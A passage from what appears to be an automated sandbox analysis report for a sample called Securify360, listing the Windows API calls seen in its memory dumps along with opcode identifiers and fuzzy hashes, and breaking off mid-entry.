                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: 3f2c7d9af44e29d7a72ecc235fe9dc111f128ce9422bfaa79729096d65db9ce4
                                                                                              • Instruction ID: aec4f0ae0af804ef5835b3b04ba5ea8c1280a2cd3c77fb5ce0c98e1971baffd1
                                                                                              • Opcode Fuzzy Hash: 3f2c7d9af44e29d7a72ecc235fe9dc111f128ce9422bfaa79729096d65db9ce4
                                                                                              • Instruction Fuzzy Hash: FE31B034600209EEEF759A18CC48BAD3BE6EB09320F54854BFBD5D61A9C779E740CB51
                                                                                              APIs
                                                                                              • ClientToScreen.USER32(?,?), ref: 0101B1D2
                                                                                              • GetWindowRect.USER32(?,?), ref: 0101B248
                                                                                              • PtInRect.USER32(?,?,0101C6BC), ref: 0101B258
                                                                                              • MessageBeep.USER32(00000000), ref: 0101B2C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: 6c782fa70e9b8c14c5056296ad60f8e9019a183af2581c4aa2c44a2da9e48bb0
                                                                                              • Instruction ID: ea15d49b67f6bf78cf56dc61a8b612ab848bfad6a0e9cb77b36ae12274ac3926
                                                                                              • Opcode Fuzzy Hash: 6c782fa70e9b8c14c5056296ad60f8e9019a183af2581c4aa2c44a2da9e48bb0
                                                                                              • Instruction Fuzzy Hash: 8C41AD30A00219DFDB22CF98C484AED7BF5FF49310F1480A9E9989B259D739E849CB50
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FF1326
                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FF1342
                                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FF13A8
                                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FF13FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: cac14cdbb5659c73d158265463f469d145c25a700882a5cf8715b1b59ef73ae5
                                                                                              • Instruction ID: f1be767c7801cde72d1a7a2b4e47a8c50fc4ef556dc8529e8cf3b6a74895d230
                                                                                              • Opcode Fuzzy Hash: cac14cdbb5659c73d158265463f469d145c25a700882a5cf8715b1b59ef73ae5
                                                                                              • Instruction Fuzzy Hash: 84312630D4421CEAFB31CA258809BBA7BA9BF45320F14425AF6D052AF5D3798945AB51
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00FF1465
                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FF1481
                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FF14E0
                                                                                              • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00FF1532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 6b92a76d025cdbf497654b74bbdd2f04c7a7f39cc316cb8ed77e241e7c3edd83
                                                                                              • Instruction ID: 98e5227c6565575ec9b01bd3879b29208b9fb4972e6f4795b13b938da12e9f18
                                                                                              • Opcode Fuzzy Hash: 6b92a76d025cdbf497654b74bbdd2f04c7a7f39cc316cb8ed77e241e7c3edd83
                                                                                              • Instruction Fuzzy Hash: 0C312831D4021DDEFF34CA658C04BFABBA6BFC6330F18431AE691521E5D3798945AB61
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FC642B
                                                                                              • __isleadbyte_l.LIBCMT ref: 00FC6459
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC6487
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC64BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: af3d2eec5cc2d68fa1611e51841053ca5c69fde1d24449c496f75aa9697ad0c5
                                                                                              • Instruction ID: 0a5c28fb141049b132ebe03ba3ac06964e14caa5760750f8b52028ca0a921786
                                                                                              • Opcode Fuzzy Hash: af3d2eec5cc2d68fa1611e51841053ca5c69fde1d24449c496f75aa9697ad0c5
                                                                                              • Instruction Fuzzy Hash: E131AF31A08257AFDB29CE65CD46FAA7BA9FF40320F25402DF864D7191DB35E850EB50
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 0101553F
                                                                                                • Part of subcall function 00FF3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FF3B4E
                                                                                                • Part of subcall function 00FF3B34: GetCurrentThreadId.KERNEL32 ref: 00FF3B55
                                                                                                • Part of subcall function 00FF3B34: AttachThreadInput.USER32(00000000,?,00FF55C0), ref: 00FF3B5C
                                                                                              • GetCaretPos.USER32(?), ref: 01015550
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 0101558B
                                                                                              • GetForegroundWindow.USER32 ref: 01015591
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: de99b98c1081ff7395c1efcf2f1bf0c95b22faea1e49594118f8531231813f58
                                                                                              • Instruction ID: 59dbc2ece9a4225b30a5c9236edaca52d4ea4fc63fd3de9e4e6d250ddce7f4c8
                                                                                              • Opcode Fuzzy Hash: de99b98c1081ff7395c1efcf2f1bf0c95b22faea1e49594118f8531231813f58
                                                                                              • Instruction Fuzzy Hash: 13312D71900208AFDB10EFB5DC85DEFB7F9EF98304F10406AE555E7241EA79AE059BA0
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • GetCursorPos.USER32(?), ref: 0101CB7A
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FCBCEC,?,?,?,?,?), ref: 0101CB8F
                                                                                              • GetCursorPos.USER32(?), ref: 0101CBDC
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FCBCEC,?,?,?), ref: 0101CC16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2864067406-0
                                                                                              • Opcode ID: 8bdd36ca4ce1b7ea84965d32e5b47a72c7daf816f97b3a57e665d844f7448103
                                                                                              • Instruction ID: 2c0344268a4ec32b09a35bd0a03cc971b16f2f77b551424bd7154a3e65b2ea73
                                                                                              • Opcode Fuzzy Hash: 8bdd36ca4ce1b7ea84965d32e5b47a72c7daf816f97b3a57e665d844f7448103
                                                                                              • Instruction Fuzzy Hash: 4231C134600118AFEB658F58CC84EBB7FF5FB09710F444099FA8597269C3399951FBA0
                                                                                              APIs
                                                                                              • __setmode.LIBCMT ref: 00FB0BE2
                                                                                                • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7E51,?,?,00000000), ref: 00FA4041
                                                                                                • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7E51,?,?,00000000,?,?), ref: 00FA4065
                                                                                              • _fprintf.LIBCMT ref: 00FB0C19
                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 00FE694C
                                                                                                • Part of subcall function 00FB4CCA: _flsall.LIBCMT ref: 00FB4CE3
                                                                                              • __setmode.LIBCMT ref: 00FB0C4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                              • String ID:
                                                                                              • API String ID: 521402451-0
                                                                                              • Opcode ID: b6e1314bfc74159f7f3788f8baf4259459cad8d8db0d39b8b779968ebe0f338e
                                                                                              • Instruction ID: 2081f7232d1fca0fcd2eaef868a7ec68245afad13110fe364b6259af97b107ec
                                                                                              • Opcode Fuzzy Hash: b6e1314bfc74159f7f3788f8baf4259459cad8d8db0d39b8b779968ebe0f338e
                                                                                              • Instruction Fuzzy Hash: EC113D729042086EDB14B7A69C43DFE7B5DDF41320F200116F20457283DF696C42BBA1
                                                                                              APIs
                                                                                                • Part of subcall function 00FE8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8D3F
                                                                                                • Part of subcall function 00FE8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D49
                                                                                                • Part of subcall function 00FE8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D58
                                                                                                • Part of subcall function 00FE8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D5F
                                                                                                • Part of subcall function 00FE8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D75
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FE92C1
                                                                                              • _memcmp.LIBCMT ref: 00FE92E4
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE931A
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00FE9321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1592001646-0
                                                                                              • Opcode ID: 4b4c955c59252f8aefffac872dbde40a9fd48e2b28265b0507d771e068ec694b
                                                                                              • Instruction ID: 224a7895e85b0bdb3e9d4c35cff08b2eca5c974c8a3aa82f54c2b82cd31fd76d
                                                                                              • Opcode Fuzzy Hash: 4b4c955c59252f8aefffac872dbde40a9fd48e2b28265b0507d771e068ec694b
                                                                                              • Instruction Fuzzy Hash: E621AF31E44208EFDB20DFA6C945BEEF7B8FF44311F144059E894A7290D7B5AA05EBA0
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01001E6F
                                                                                                • Part of subcall function 01001EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01001F18
                                                                                                • Part of subcall function 01001EF9: InternetCloseHandle.WININET(00000000), ref: 01001FB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1463438336-0
                                                                                              • Opcode ID: 369703ac062f4b85d730169853455331b03092f51c2988a1b8e034f7d295b67c
                                                                                              • Instruction ID: c100e6df35b40057ae30491057041c2488d72f6b33d84eb7801fecb44b387307
                                                                                              • Opcode Fuzzy Hash: 369703ac062f4b85d730169853455331b03092f51c2988a1b8e034f7d295b67c
                                                                                              • Instruction Fuzzy Hash: 52219F31600746BFFB239F649C00FBFBBAABF84700F10411AFA8596694DB71E8119B90
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 010163BD
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010163D7
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010163E5
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 010163F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                              • String ID:
                                                                                              • API String ID: 2169480361-0
                                                                                              • Opcode ID: 089eedb5f693d043ead3ee3214c863cba0bed8278eca47cbfc3f80927750023d
                                                                                              • Instruction ID: c42f019e42763cc765c2fabed3af41d65defd53ca128fa259b23efe53f487944
                                                                                              • Opcode Fuzzy Hash: 089eedb5f693d043ead3ee3214c863cba0bed8278eca47cbfc3f80927750023d
                                                                                              • Instruction Fuzzy Hash: 7411E631305514AFEB15AF28CC44FBE7B99EF45320F148119F956C72D1CBAAAD01CB95
                                                                                              APIs
                                                                                                • Part of subcall function 00FEF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FEE46F,?,?,?,00FEF262,00000000,000000EF,00000119,?,?), ref: 00FEF867
                                                                                                • Part of subcall function 00FEF858: lstrcpyW.KERNEL32(00000000,?,?,00FEE46F,?,?,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEF88D
                                                                                                • Part of subcall function 00FEF858: lstrcmpiW.KERNEL32(00000000,?,00FEE46F,?,?,?,00FEF262,00000000,000000EF,00000119,?,?), ref: 00FEF8BE
                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEE488
                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEE4AE
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEE4E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: 7f395029d54899b64851141f1bedfc98a82959f93f18b614f7a694af4537f93c
                                                                                              • Instruction ID: 94351c4d7dcfb6c4d535d4cedf428c16082565c225e20d220f08018d0c2083f7
                                                                                              • Opcode Fuzzy Hash: 7f395029d54899b64851141f1bedfc98a82959f93f18b614f7a694af4537f93c
                                                                                              • Instruction Fuzzy Hash: 3411223A200384AFCB20AF35EC45D7A77A9FF45360B50402AF846CB290EB359940EB90
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00FC5331
                                                                                                • Part of subcall function 00FB593C: __FF_MSGBANNER.LIBCMT ref: 00FB5953
                                                                                                • Part of subcall function 00FB593C: __NMSG_WRITE.LIBCMT ref: 00FB595A
                                                                                                • Part of subcall function 00FB593C: RtlAllocateHeap.NTDLL(01490000,00000000,00000001,?,?,?,?,00FB1003,?,0000FFFF), ref: 00FB597F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 0df0cad3cd16812d45a02b3e8da3168d517bdb9f49c9c17e0a52b73a379204a7
                                                                                              • Instruction ID: db1461a2df82de3112467370a5b01461b32855987119ab77ca2181ae7374588f
                                                                                              • Opcode Fuzzy Hash: 0df0cad3cd16812d45a02b3e8da3168d517bdb9f49c9c17e0a52b73a379204a7
                                                                                              • Instruction Fuzzy Hash: 1E113832900A07AFCB302F70AD06B9A36999F54BF0B10451EF8489A090CE799881FB80
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00FF4385
                                                                                              • _memset.LIBCMT ref: 00FF43A6
                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00FF43F8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FF4401
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1157408455-0
                                                                                              • Opcode ID: 519510251444c0fa0b9e87049e7e5b17e8bea000614513fd059fa3775346bee5
                                                                                              • Instruction ID: 9bf732267e13bf300e2368cab9b9aa13258a6d5ce08d91c93e99b064f2e3bcdd
                                                                                              • Opcode Fuzzy Hash: 519510251444c0fa0b9e87049e7e5b17e8bea000614513fd059fa3775346bee5
                                                                                              • Instruction Fuzzy Hash: 3011E771D0132C7AE7309AA5AC4DFEBBB7CEF45760F10459AF908E7190D2744E809BA4
                                                                                              APIs
                                                                                                • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7E51,?,?,00000000), ref: 00FA4041
                                                                                                • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7E51,?,?,00000000,?,?), ref: 00FA4065
                                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 01006A84
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 01006A8F
                                                                                              • _memmove.LIBCMT ref: 01006ABC
                                                                                              • inet_ntoa.WSOCK32(?), ref: 01006AC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 1504782959-0
                                                                                              • Opcode ID: ab6646c18cbcbcea7870d9610e060e9bca891179a3cc1c66db0cae0c0fecc6b9
                                                                                              • Instruction ID: dff056b3e6ef88bed3864e047027fd56b167129bdcd26c5c1aa1c605ffe021a3
                                                                                              • Opcode Fuzzy Hash: ab6646c18cbcbcea7870d9610e060e9bca891179a3cc1c66db0cae0c0fecc6b9
